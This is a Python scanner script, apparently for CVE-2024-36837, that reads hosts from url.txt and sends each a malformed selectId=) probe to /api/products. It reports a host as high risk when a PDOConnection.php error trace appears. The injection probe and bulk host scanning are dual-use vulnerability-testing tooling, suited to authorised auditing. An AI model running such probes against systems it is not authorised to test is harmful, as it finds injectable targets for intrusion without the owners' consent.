CVE-2024-36837.py
import requests
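def check_vulnerability(url, timeout=10):
    """Send one probe request to *url* and print whether the error signature appears.

    The request targets ``/api/products`` with an unbalanced ``)`` in the
    ``selectId`` parameter. If the response body contains the string
    ``PDOConnection.php`` the host is reported as high risk. That file name
    in a response presumably comes from a database error trace being echoed
    to the client (TODO: confirm against the CVE-2024-36837 advisory).

    The verdict is a heuristic on the response text only. A host that
    suppresses error output, or a proxy in front of it that rewrites the
    response, will not show the signature, so a negative result does not
    establish that the host is patched. Confirm the installed version
    separately before closing a finding.

    Args:
        url: Base URL of the host, including the scheme.
        timeout: Seconds passed to ``requests.get`` as its timeout.

    Returns:
        None. The verdict is printed to stdout.
    """
    # Drop trailing slashes so the endpoint path is not doubled up.
    url = url.rstrip('/')
    # Endpoint and malformed selectId value, unchanged from the original check.
    test_url = f"{url}/api/products?limit=20&priceOrder=&salesOrder=&selectId=)"
    try:
        # Without a timeout a single unresponsive host stalls the whole run.
        response = requests.get(test_url, timeout=timeout)
    except requests.RequestException as e:
        # Report the failure reason so DNS, TLS and timeout errors can be told apart.
        print(f"\033[33m[ERROR]\033[0m Could not connect to {url}. Error: {e}")
        return

    if 'PDOConnection.php' in response.text:
        print(f"\033[31m[HIGH RISK]\033[0m Vulnerability found in: {url}")
    else:
        # Absence of the signature is not proof of a fix, so the status code
        # is shown to let the operator spot block pages and 404s.
        print(
            f"\033[32m[NOT DETECTED]\033[0m Error signature not present in "
            f"response from: {url} (HTTP {response.status_code})"
        )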
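def main():
    """Read target hosts from ``url.txt`` (one per line) and check each in turn.

    Blank lines are skipped. An entry without an ``http://`` or ``https://``
    scheme is given ``http://``, so it is probed over plain HTTP.
    """
    # Read the whole list first so the file is closed before any network I/O.
    with open('url.txt', 'r', encoding='utf-8') as file:
        urls = [line.strip() for line in file]

    for url in urls:
        if not url:
            # An empty line would otherwise become the bare string 'http://'.
            continue
        # Match the full scheme prefix: a host name that merely begins with
        # "http" (with no scheme) still needs one added.
        if not url.lower().startswith(('http://', 'https://')):
            url = 'http://' + url
        check_vulnerability(url)


if __name__ == "__main__":
    main()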